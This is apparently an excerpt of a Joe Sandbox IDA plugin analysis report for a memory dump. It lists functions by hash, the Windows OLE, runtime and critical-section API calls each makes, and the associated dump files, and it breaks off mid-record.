                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1774866819-0
                                            • Opcode ID: 88d6c654a0b0420a19f7549a12862ec46ce97a4a524355b1cff63728773266e2
                                            • Instruction ID: c5170153260ba8f6974d7bb26c7c80b2b0457ebdf13b2c876891020a8a7fee20
                                            • Opcode Fuzzy Hash: 88d6c654a0b0420a19f7549a12862ec46ce97a4a524355b1cff63728773266e2
                                            • Instruction Fuzzy Hash: 9AA148756006099FDB14DF98C884EEEB7F9BF8D314F548568E50AAB790CA34F841CB60
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 689668B2
                                            • VariantInit.OLEAUT32(?), ref: 689668BD
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 689668D7
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 689668FD
                                            • VariantClear.OLEAUT32(?), ref: 68966909
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 68966923
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 68966981
                                            • VariantClear.OLEAUT32(?), ref: 6896699E
                                            • VariantClear.OLEAUT32(?), ref: 689669A4
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 3529038988-0
                                            • Opcode ID: 3abb970c013713532df13cf4cb6c97782484abbcaba3a83b668ed7a247d312b8
                                            • Instruction ID: a6873886d78718398dbf9debac75445116349e4e9d79400aa3b4d675e8dc685c
                                            • Opcode Fuzzy Hash: 3abb970c013713532df13cf4cb6c97782484abbcaba3a83b668ed7a247d312b8
                                            • Instruction Fuzzy Hash: C8415CB2A00209EFDB01DFA5C884AEEBBB8FF99314F144119E915A7240E775E945CFA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit
                                            • String ID:
                                            • API String ID: 2610073882-0
                                            • Opcode ID: fe4dfe0cd5c5e2a5a20c39288449a4c7fb3f8031d6c9be0163797bcf5a1109a3
                                            • Instruction ID: b033fee6051d682a393640369733d5373b2aab97a20df7faadec6e568108e42e
                                            • Opcode Fuzzy Hash: fe4dfe0cd5c5e2a5a20c39288449a4c7fb3f8031d6c9be0163797bcf5a1109a3
                                            • Instruction Fuzzy Hash: 46C144756087059FC300DF68C88491BBBE9FFC9708F648A4DF9A89B264D731E845CB92
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 68966C8B
                                            • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 68966CA6
                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 68966CC7
                                              • Part of subcall function 68965760: std::tr1::_Xweak.LIBCPMT ref: 68965769
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 68966CF9
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 68966F13
                                            • InterlockedCompareExchange.KERNEL32(689EC6A4,45524548,4B4F4F4C), ref: 68966F34
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                            • String ID:
                                            • API String ID: 2722669376-0
                                            • Opcode ID: 68053203cc3ad0414c56b6461f41241e8fbee8135e11da85dbf16de2c3bf2783
                                            • Instruction ID: 570544fc4b0adfd4ae41f9db04b73bef813bba03a4f39d4203c41010ba05b5d7
                                            • Opcode Fuzzy Hash: 68053203cc3ad0414c56b6461f41241e8fbee8135e11da85dbf16de2c3bf2783
                                            • Instruction Fuzzy Hash: 88D127B4A002049FEB11CFA4C894BAF77F8FF45318F804469E6199B281D771EC90CBA1
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::tr1::_Xweak.LIBCPMT ref: 68951B53
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68951B5D
                                            • std::exception::exception.LIBCMT ref: 68951C43
                                            • __CxxThrowException@8.LIBCMT ref: 68951C58
                                            Strings
                                            • invalid vector<T> subscript, xrefs: 68951B58
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                            • String ID: invalid vector<T> subscript
                                            • API String ID: 3098024973-3016609489
                                            • Opcode ID: 1e8e81092ee5ca184fbbb4b683f4e7ee6a57d657ceecfbe16559481b4fb11b88
                                            • Instruction ID: b677c863b6b7b822c49258e68694a866d5e6e1425e83ecc07974bb87f3ee921a
                                            • Opcode Fuzzy Hash: 1e8e81092ee5ca184fbbb4b683f4e7ee6a57d657ceecfbe16559481b4fb11b88
                                            • Instruction Fuzzy Hash: 28223A75C007099FCB10CFA4C4809EEBBF9BF48314F558A5ED45AAB654E774EA88CB81
                                            APIs
                                            • VariantInit.OLEAUT32(689631EC), ref: 6895DB5E
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6895DB6E
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6895DB82
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6895DBF1
                                            • VariantClear.OLEAUT32(?), ref: 6895DBFB
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                            • String ID:
                                            • API String ID: 182531043-0
                                            • Opcode ID: 0e0f9b42927923b3f47b80c8ade820dc3538063e4ddaeb12a789beadd6bd818c
                                            • Instruction ID: b9a213123742e6be919eaf7f1ddc2d2acc9e80cd95cb741c6f075097558bf7b2
                                            • Opcode Fuzzy Hash: 0e0f9b42927923b3f47b80c8ade820dc3538063e4ddaeb12a789beadd6bd818c
                                            • Instruction Fuzzy Hash: DA318F7AA04205AFD700DF54C848EEEBBB9FF9A710F11816AE911AB300D735E801CFA1
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,?), ref: 6895DA16
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6895DA33
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6895DA9E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyElementVector
                                            • String ID: Aj?Q
                                            • API String ID: 3149346722-52356588
                                            • Opcode ID: 68eb615be1c08a8a438c7be4419ebc373c63b1714585e20a4f0c188f9b524276
                                            • Instruction ID: 9c1726de94b7aeae73b49256a9612885cb60b3ea15139a39bead373e767dd924
                                            • Opcode Fuzzy Hash: 68eb615be1c08a8a438c7be4419ebc373c63b1714585e20a4f0c188f9b524276
                                            • Instruction Fuzzy Hash: F8213975304206EFEB00DFA9C884B9B77ACEF5A304F504069EA15DB340E771D921CBA2
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6895D949
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6895D96C
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6895D9CF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyElementVector
                                            • String ID: Aj?Q
                                            • API String ID: 3149346722-52356588
                                            • Opcode ID: a2bc5ee7694f55070bdae119a4d9aadfe9c0c434f44500b05ced7d726679e5f4
                                            • Instruction ID: acf417ed708cbfa4aa23cf966caa97aef080f1bf507d3e38a1a571cb0fd8fa97
                                            • Opcode Fuzzy Hash: a2bc5ee7694f55070bdae119a4d9aadfe9c0c434f44500b05ced7d726679e5f4
                                            • Instruction Fuzzy Hash: F5219D75301218AFEB11CF98C894FAB77A8EF8A744F1040A8E958DB344D771D911CBA2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: T@12
                                            • String ID: a0
                                            • API String ID: 456891419-3188653782
                                            • Opcode ID: 146cf84839ded824ae65268d08c88a50fca7b64740be4b2a8913ee19edaa2b3a
                                            • Instruction ID: 06b1b3e8a6297f63dd47d35507fa91eb0c08278a0a3dc5fdb2548c7dddf6dba1
                                            • Opcode Fuzzy Hash: 146cf84839ded824ae65268d08c88a50fca7b64740be4b2a8913ee19edaa2b3a
                                            • Instruction Fuzzy Hash: 5511E2B0D15256ABEB209A764C4CF6FBAFCAB81F58F809418B435F6140D739D941CB60
                                            APIs
                                            • _malloc.LIBCMT ref: 689A9BCF
                                              • Part of subcall function 689A9D66: __FF_MSGBANNER.LIBCMT ref: 689A9D7F
                                              • Part of subcall function 689A9D66: __NMSG_WRITE.LIBCMT ref: 689A9D86
                                              • Part of subcall function 689A9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,689A9BD4,68941290,513F6A41), ref: 689A9DAB
                                            • std::exception::exception.LIBCMT ref: 689A9C04
                                            • std::exception::exception.LIBCMT ref: 689A9C1E
                                            • __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                            • String ID:
                                            • API String ID: 615853336-0
                                            • Opcode ID: f0b71e4be14e9a3d80459c075dcb8f9b73bb116c6ad5cd5569dc304d8cbadfb4
                                            • Instruction ID: 66d6eed1de0f8978375f9cfcb52d3030372b09aeba325089e0e53118dbf29298
                                            • Opcode Fuzzy Hash: f0b71e4be14e9a3d80459c075dcb8f9b73bb116c6ad5cd5569dc304d8cbadfb4
                                            • Instruction Fuzzy Hash: 10F0A436500619AEDF10EB68CC55A6D7EF8BF9271CFD00419E430A6190DB73CA419651
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 68956C73
                                            • SafeArrayAccessData.OLEAUT32(00000000,68956C3C), ref: 68956C87
                                            • _memmove.LIBCMT ref: 68956C9A
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 68956CA3
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
                                            • String ID:
                                            • API String ID: 3147195435-0
                                            • Opcode ID: 4701896a1e326ca7eab797bfbe049ab324221d0f1ba0c79354f328e99bafb543
                                            • Instruction ID: 768d8cea02189681559bbfb942360544299408dc1d491741751a12e7c471383b
                                            • Opcode Fuzzy Hash: 4701896a1e326ca7eab797bfbe049ab324221d0f1ba0c79354f328e99bafb543
                                            • Instruction Fuzzy Hash: 3CF05E75304218BBEB219F51DC89FDB3BACEF96760F008015FA188E240E671D500CBB1
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68972206
                                            • __CxxThrowException@8.LIBCMT ref: 68972221
                                              • Part of subcall function 68976480: __CxxThrowException@8.LIBCMT ref: 68976518
                                              • Part of subcall function 68976480: __CxxThrowException@8.LIBCMT ref: 68976558
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$_mallocstd::exception::exception
                                            • String ID: ILProtector
                                            • API String ID: 84431791-1153028812
                                            • Opcode ID: b7005ee6af6c000d5282fdac48f5373e998719bc3bf04e3ca6ca74db0def7283
                                            • Instruction ID: 81bb9975c1a75be75c650816a4658d21999be1290f9ba683c9d6d7d03af5d8c3
                                            • Opcode Fuzzy Hash: b7005ee6af6c000d5282fdac48f5373e998719bc3bf04e3ca6ca74db0def7283
                                            • Instruction Fuzzy Hash: 72713975905259DFCB24CFA8C884BEEBBB5FF59304F1081A9E41AA7340DB71AA44CF91
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6895913B
                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6895915C
                                            • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 68959170
                                            • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 68959191
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: 739dba2ad4721d01df368dae6147aaad57131a0850f5ee33e99726ccd2583a19
                                            • Instruction ID: ac340e80308a45f09853fa3c93263937eb7f4e865791d0d12991eb8b9743224f
                                            • Opcode Fuzzy Hash: 739dba2ad4721d01df368dae6147aaad57131a0850f5ee33e99726ccd2583a19
                                            • Instruction Fuzzy Hash: 124131B69002099FCB04DF99D9848EEBBB8FF49214B50855ED916AB300D731EA15CFA1
                                            APIs
                                            • EnterCriticalSection.KERNEL32 ref: 68958E89
                                            • LeaveCriticalSection.KERNEL32(?,00000000), ref: 68958EAD
                                            • _memset.LIBCMT ref: 68958ED2
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave_memset
                                            • String ID:
                                            • API String ID: 3751686142-0
                                            • Opcode ID: da36df46be56ddb6f7ca28674e7fb13fb42036f53ed2195e542840124e2d63d0
